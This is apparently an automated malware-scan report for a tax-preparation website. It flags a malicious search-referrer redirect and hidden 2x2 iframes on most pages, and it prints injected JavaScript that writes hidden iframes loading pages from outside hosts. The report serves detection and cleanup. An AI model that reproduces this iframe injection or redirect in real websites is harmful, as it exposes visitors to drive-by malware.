Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://corptaxprep.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: corptaxprep.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 01 Sep 2014 04:38:23 GMT Location: http://babylonproduction.com/wmcf.html?h=923529 Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://corptaxprep.com/ | 200 OK Content-Length: 10422 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/ypSlideOutMenusC.js | 200 OK Content-Length: 5447 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ypSlideOutMenu.Registry = [] ypSlideOutMenu.aniLen = 250 ypSlideOutMenu.hideDelay = 1000 ypSlideOutMenu.minCPUResolution = 10 function ypSlideOutMenu(id, dir, left, top, width, height) { this.ie = document.all ? 1 : 0 this.ns4 = document.layers ? 1 : 0 this.dom = document.getElementById ? 1 : 0 if (this.ie || this.ns4 || this.dom) { this.id = id this.dir = dir this.orientation = dir == "left" || dir == "right" ? "h" : "v" this.dirType = dir == } ypSlideOutMenu.prototype.onactivate = function() { } ypSlideOutMenu.prototype.ondeactivate = function() { } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmcf.html?i=923529></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmcf.html?i=923529 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmcf.html?i=923529> Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/faq.htm | 200 OK Content-Length: 15156 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/privacy.htm | 200 OK Content-Length: 22482 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/contact.htm | 200 OK Content-Length: 8939 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/profile.htm | 200 OK Content-Length: 8617 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/taxpros.htm | 200 OK Content-Length: 9817 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/about.htm | 200 OK Content-Length: 9441 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/services1.htm | 200 OK Content-Length: 24509 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/services2.htm | 200 OK Content-Length: 10941 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/services3.htm | 200 OK Content-Length: 9729 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://corptaxprep.com/prior.htm | 200 OK Content-Length: 7176 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/refer.htm | 200 OK Content-Length: 7550 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> | ||
http://corptaxprep.com/form1.php | 200 OK Content-Length: 25077 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://globalconferencemanagementgroup.com/hcwf.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globalconferencemanagementgroup.com/hcwf.html> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=corptaxprep.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://corptaxprep.com/
Result: corptaxprep.com is not infected or malware details are not published yet.
Result: corptaxprep.com is not infected or malware details are not published yet.